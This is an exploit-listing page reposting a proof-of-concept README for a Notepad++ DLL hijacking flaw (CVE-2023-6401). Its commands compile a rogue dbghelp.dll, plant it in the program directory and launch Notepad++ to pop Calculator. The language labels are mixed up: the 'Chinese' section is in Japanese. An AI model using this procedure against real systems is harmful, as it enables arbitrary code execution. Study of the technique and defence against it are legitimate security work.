Sploitus

Exploit for CVE-2023-6401

kitploit · 2026-09-02

Exploit Code

MARKDOWN40 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-MEKITOCI-CVE-2023-6401
# CVE-2023-6401 · DLLハイジャック概念実証

![License](https://img.shields.io/badge/License-MIT-blue.svg) ![Platform](https://img.shields.io/badge/Platform-Windows-lightgrey.svg)

英語 | 中国語

* * *

## 中国語

> ⚠️ **重要な声明:セキュリティ研究および教育目的のみに使用してください**

NotePad++ ≤ 8.1 DLLハイジャック脆弱性の概念実証。アプリケーションディレクトリに悪意のある `dbghelp.dll` を配置することで任意のコードを実行します。

### クイックスタート

root@kitploit:~
    
    
    # 下載專案
    git clone https://github.com/mekitoci/CVE-2023-6401.git
    
    # 進入專案目錄
    cd CVE-2023-6401-main
    
    # 編譯DLL
    # gcc -shared -o dbghelp.dll dbghelp.c -Wall -Wl,--subsystem,windows
    
    # 部署到NotePad++目錄
    copy dbghelp.dll "C:\Program Files\Notepad++\"
    
    # 執行測試
    "C:\Program Files\Notepad++\notepad++.exe"
    
    # 立即清理
    del "C:\Program Files\Notepad++\dbghelp.dll"
    

**期待される結果:** 電卓が起動 + メッセージボックス表示 + NotePad++が正常に起動